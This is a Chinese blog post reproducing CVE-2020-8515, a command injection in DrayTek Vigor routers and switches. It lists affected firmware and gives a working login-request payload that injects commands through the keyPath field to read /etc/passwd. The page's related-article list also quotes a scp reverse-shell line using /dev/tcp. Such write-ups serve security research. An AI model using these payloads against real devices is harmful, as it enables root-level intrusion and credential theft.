Draytek企业网络设备命令注入复现(CVE-2020-8515)

最新推荐文章于 2024-03-08 16:24:03 发布
最新推荐文章于 2024-03-08 16:24:03 发布
阅读量1.2k 收藏
点赞数
文章标签: 安全 linux shell java 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37602797/article/details/117811895
版权

v2-67158082b3e5c2483dafb55a27025a78_b.jpg


一、漏洞描述

DrayTek URI未能正确处理SHELL字符,远程攻击者可以利用该漏洞提交特殊的请求,可以ROOT权限执行任意命令。

远程命令注入漏洞被标记为CVE-2020-8515,主要影响了DrayTek Vigor网络设备,包括企业交换机、路由器、负载均衡器和VPN网关。

二、影响范围

Vigor2960 < v1.5.1

Vigor300B < v1.5.1

Vigor3900 < v1.5.1

VigorSwitch20P2121 <= v2.3.2

VigorSwitch20G1280 <= v2.3.2

VigorSwitch20P1280 <= v2.3.2

VigorSwitch20G2280 <= v2.3.2

VigorSwitch20P2280 <= v2.3.2

三、漏洞复现

登录界面登录burp抓包:


v2-f3d83ec6d0c3a5a1fec977da3622541a_b.jpg


抓取登录数据包添加keypath的paylod的字段

payloay:

action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a

在这个基础上继续研究了本漏洞支持其他可以执行的命令:

action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a

shell方面,因为输入的命令是由mainfunction.cgi解析的,所以空格会被替换为“+”(存在一些困难)。

注入点涉及keyPath和rtick,和/www/cgi-bin/mainfunction.cgi文件有关,对应的web服务程序为/usr/sbin/lighttpd

主要是&符号的执行,可以进行拼接,但是|、;就不行

python脚本验证:


v2-f17296d8da166c5b85291d827b3d5101_b.jpg


四、参考链接:

nosec.org/home/detail/4

cve.mitre.org/cgi-bin/c

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

公众号:


v2-08401c1e12264d737138ad072495622d_b.jpg


thelostworld:


v2-c63907909925385c02bd103dd075d597_b.jpg


个人知乎:zhihu.com/people/fu-wei

个人简书:jianshu.com/u/bf0e38a8d

thelostworld-公众号
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DrayTek Vigor AP910C 路由器后台RCE漏洞复现
0xSec
12-12 788
DrayTekVigorAP910C存在后台RCE漏洞。攻击者可通过该漏洞在设备任意执行代码写入后门,获取设备权限,进而控制整个设备
Hoaxcalls僵尸网络:利用CVE-2020-8515/5722漏洞
systemino的博客
04-08 1419
概述 CVE-2020-8515漏洞POC今年3月发布后,就被用于新的DDoS僵尸网络中。进一步分析表明该恶意软件也在利用CVE-2020-5722漏洞进行传播。检测到的攻击流量自2020年3月31日以来增加了一倍,表明许多Grandstream UCM6200 和Draytek Vigor设备已经被感染或正在被攻击。Grandstream设备是基于IP的商用电话系统,Draytek是路由器设备...
29款DrayTek 路由器受严重RCE漏洞影响
smellycat000的专栏
08-05 1238
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Trellix 公司的安全研究员发现一个严重的远程代码执行 (RCE)漏洞 (CVE-2022-32548),影响29款 DrayTek Vigor 系列企业路由器。该漏洞过的CVSS v3 评分为10分,为‘’严重”级别。无需凭据或用户交互,默认的设备配置即可使攻击者通过互联网和LAN利用该漏洞实施攻击。利用该漏洞的黑...
攻击者正利用DrayTek路由器0day漏洞修改DNS设置
weixin_33882452的博客
05-21 894
DrayTek是一家台湾宽带CPE(客户端设备)制造商,其生产的设备主要包括路由器、交换机、防火墙以及VPN设备等。5月18日,该公司宣布称,黑客正在利用其DrayTek路由器中存在的0day漏洞,来更改部分路由器的DNS设置。 就在多位DrayTek路由器用户在Twitter上报告称,发现了DrayTek路由器的DNS设置已经更改,并指向位于3...
DrayTek Vigor 路由器远程命令执行漏洞复现(CNVD-2022-31821)
Li-D的博客
01-31 777
DrayTek是中国台湾的一家网络设备制造商,其产品包括VPN路由器、管理型交换机、无线AP和管理系统等,并被中小型企业广泛使用。DrayTek路由器系统存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限。
Draytek Smart Client 5.6.4
最新发布
03-29
Draytek Smart Client 5.6.4 For Windows
DrayTek路由器设置.xls
07-12
设置登陆端口 http Port 本来是:80端口。现在设为401端口。
draytek路由器设置
01-15
draytek路由器设置
scot-deer-collisions:R Shiny应用
05-05
username = " matt-dray " ) 该应用程序依赖于以下软件包:{shiny},{shinydashboard},{leaflet},{DT},{dplyr},{sf}和{icon}。 数据 从博客文章: 由管理一直在监测英国的鹿与汽车碰撞数据。 数据已打开。 ...
vue-drag-drop:轻量级的Vue包装器,抽象出了拖放浏览器API的重要部分
02-06
:exclamation_mark: 1.0.0版本已经发布! 最后,这包括对IE / Edge的支持。 请注意,这需要完全跳过本机transferData事件属性,而转而使用保留当前拖动传递信息的全局变量。 从理论上讲,这可以打破一些极端事件,...
draytek-vigor-2960 远程命令执行
weixin_43567873的博客
03-08 123
draytek-vigor-2960 远程命令执行
DrayTek Vigor 2920防火墙路由器英文固件改中文固件
异次元网络的博客
02-21 1677
1、查看路由器当前接口网关(运行输入CDM→输入ipconfig)。 2、打开浏览器输入网关地址→按回车(上图可以看出笔者路由器网关地址为:192.168.1.1),然后输入用户名跟密码,默认用户名为:admin 密码:admin 3、登录路由器后可以看到型号名称、固件版本等信息。 4、进官方网站下载简体中文固件(注意:要进官方中文站,不要进台湾站,因为台湾站目前只有繁体中文固件跟英文固件)。 5、固件下载后解压,可获得两个文件。 5、选择 System Maintenance(系统维护)→Fi
CVE-2020-14386: Linux内核权限提升漏洞通告
爱国小白帽
09-23 2317
360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-092301 报告来源:360CERT 报告作者:360CERT 更新日期:2020-09-23 0x01 漏洞简述 2020年09月23日,360CERT监测发现 openwall邮件组 发布了 linux-kernel 权限提升漏洞 的风险通告,该漏洞编号为 CVE-2020-14386 ,漏洞等级:高危,漏洞评分:7.8。 本地攻击者通过向受影响的主机发送特制的请求内容,可以造成权限提升
CVE-2020-0796 Windows SMBv3 LPE Exploit POC 分析
systemino的博客
04-09 402
0x00 漏洞背景 2020年3月12日微软确认在Windows 10最新版本中存在一个影响SMBv3协议的严重漏洞,并分配了CVE编号CVE-2020-0796,该漏洞可能允许攻击者在SMB服务器或客户端上远程执行代码,3月13日公布了可造成BSOD的poc,3月30日公布了可本地特权提升的poc, 这里我们来分析一下本地特权提升的poc。 0x01 漏洞利用原理 漏洞存在于在srv2.s...
CVE-2020-10882 TP-Link Archer A7(AC1750)路由器RCE
子曰小玖的博客
04-13 2074
TP-Link Archer A7 AC1750是中国普联(TP-Link)公司的一款无线路由器。固件版本为190726中tdpServer服务在未经身份验证情况下,可进行命令注入,但仅可被路由器LAN端的攻击者利用。 CVE编号 CVE-2020-10882 固件更新 A7(US)_V5_200220 本文分析基于:tdpServer守护程序/usr/bin/tdpServe...
cve-2020-8597PPPD漏洞修复
luuuone的博客
04-13 2528
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
CVE-2020-15778漏洞复现
热门推荐
臭nana的博客
08-04 1万+
产品:Openssh 影响的组件:SCP 漏洞版本:<= openssh-8.3p1 scp命令引发的命令注入 反弹shell的payload scp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt' 实战测试,这里使用本机进行测试 1、查看ssh版本,符合漏洞版本 ssh -V 2、先在本地新建好文件,用于上传 2、本地开启监听 3、使用s.
http://223.4.208.72/index.php,web扫描
weixin_36150816的博客
03-09 4431
扫描记录:default 可疑文件访问 110.254.34.217 /aaaaaa.zip 2020-06-23 09:04:48 404 1default 敏感目录访问 67.187.170.128 /administrator/db/index.php?lang=en 2020-06-20 16:15:23 404 1default 可疑文件访问 113.75.17.145 /web.zip...
通用Login登陆模块(单机项目一)
weixin_42447373的博客
10-17 1218
此登陆模块主要分为两点: 1.加密解密:在前端加密,后端解密。2.生成随机码并验证。这里先介绍加密解密部分。 /** * 检查用户名称 * * @param user * @param req * @return */ @RequestMapping(params = "checkuser") @ResponseBody public AjaxJson che...
useradd -m -d
09-22
useradd -m -d是一个Linux系统中创建用户的命令,其中-m表示同时创建用户的主目录,-d后面跟着指定的目录路径,表示指定用户主目录的位置。这个命令还可以使用其他选项,比如-g指定用户所属的主组,-G指定用户所属的附加组,-s指定用户的登录Shell等等。这个命令还可以结合其他命令一起使用,比如passwd命令可以用于修改用户的密码,userdel命令可以用于删除用户账号。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值